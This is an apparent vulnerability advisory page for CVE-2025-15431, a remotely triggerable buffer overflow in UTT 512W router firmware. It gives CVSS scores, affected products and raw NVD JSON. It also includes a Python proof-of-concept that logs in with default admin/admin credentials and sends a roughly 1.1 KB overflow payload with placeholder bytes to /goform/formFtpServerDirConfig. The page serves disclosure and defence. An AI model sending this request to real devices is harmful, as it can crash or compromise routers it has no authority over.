Security Vulnerability Report
CVE-2025-15431 CVSS 8.8 HIGH

CVE-2025-15431

Published: 2026-01-02 06:15:54
Last Modified: 2026-02-23 09:16:21

Description

A flaw has been found in UTT 进取 512W 1.7.7-171114. This affects the function strcpy of the file /goform/formFtpServerDirConfig. Executing a manipulation of the argument filename can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

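cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:* (versions up to and including 1.7.7-171114) - VULNERABLE
cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:* (hardware platform, matched together with the firmware entry above) - NOT VULNERABLE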
UTT 进取 512W 固件 1.7.7-171114

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""Proof-of-concept request for CVE-2025-15431 (UTT 进取 512W, firmware 1.7.7-171114).

The script logs in to the router's web interface and then POSTs an
over-long ``filename`` form field to /goform/formFtpServerDirConfig, the
handler the advisory says copies that field with strcpy. The payload
bytes are placeholders, as the original listing states.

Notes for defenders, based on what this listing and the advisory show:

* The request is authenticated first, which matches PR:L in the CVSS
  vector. The listing falls back to admin/admin, so a device still using
  default credentials satisfies that requirement.
* The observable request is a POST to /goform/formFtpServerDirConfig
  whose ``filename`` value is about 1.1 KB long. A field of that length
  on this endpoint is a reasonable thing to alert on.
* The advisory records no vendor response, so no fix is referenced here.
  Limiting who can reach the management interface and replacing default
  credentials reduce exposure.

NOTE(review): the login path and form field names are taken from the
listing as-is; they are not confirmed against the device.
"""

import requests
import sys

TARGET = "http://192.168.1.1"  # Router IP
LOGIN_URL = f"{TARGET}/login.cgi"
FTP_CONFIG_URL = f"{TARGET}/goform/formFtpServerDirConfig"


def login(target_ip, username="admin", password="admin"):
    """Open a session and submit the login form.

    Returns the ``requests.Session`` when the login POST answers with
    HTTP 200, otherwise ``None``. Only the status code is checked; the
    response body is not inspected.

    NOTE(review): ``target_ip`` is never read. The request always goes to
    the module-level ``LOGIN_URL``.
    """
    http = requests.Session()
    credentials = dict(username=username, password=password)
    try:
        reply = http.post(LOGIN_URL, data=credentials, timeout=10)
        return http if reply.status_code == 200 else None
    except:
        # The original swallows every exception here and reports the
        # failure as None. Kept unchanged.
        return None


def exploit_buffer_overflow(session):
    """POST the over-long ``filename`` field to the FTP directory handler.

    The field is assembled from four byte strings and sent as a form
    value together with ``action=config``. The assembled payload is
    1008 + 100 + 8 + 4 = 1120 bytes, not the 2000 named by the unused
    ``overflow_length`` value carried over from the original.
    """
    # Carried over from the original listing; nothing below reads it.
    overflow_length = 2000

    filler = b"A" * 1008
    # Run of 0x90 bytes that the original author labels a NOP sled.
    sled = b"\x90" * 100
    # Eight placeholder bytes. The original says this is not real shellcode.
    stub = b"\x00\x01\x02\x03\x04\x05\x06\x07"
    # Example address from the original listing (0x40023040).
    ret = b"\x40\x30\x02\x40"

    payload = b"".join((filler, sled, stub, ret))

    form = {
        "filename": payload.decode('latin-1'),
        "action": "config",
    }

    try:
        reply = session.post(FTP_CONFIG_URL, data=form, timeout=10)
        print(f"[*] Payload sent, length: {len(payload)}")
        print(f"[*] Response status: {reply.status_code}")
    except requests.exceptions.RequestException as e:
        # A dropped connection is read by the author as a sign that the
        # web service went down.
        print(f"[!] Request failed (expected if target crashed): {e}")


def main():
    """Print a banner, log in, and send the request if login succeeded."""
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET

    print(f"[*] CVE-2025-15431 PoC for UTT 进取 512W")
    print(f"[*] Target: {target}")

    session = login(target)
    if not session:
        print("[-] Login failed")
        return

    print("[+] Login successful")
    exploit_buffer_overflow(session)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15431", "sourceIdentifier": "[email protected]", "published": "2026-01-02T06:15:54.113", "lastModified": "2026-02-23T09:16:21.270", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in UTT 进取 512W 1.7.7-171114. This affects the function strcpy of the file /goform/formFtpServerDirConfig. Executing a manipulation of the argument filename can lead to buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md", "source": "[email protected]", "tags": 
["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339353", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339353", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721889", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}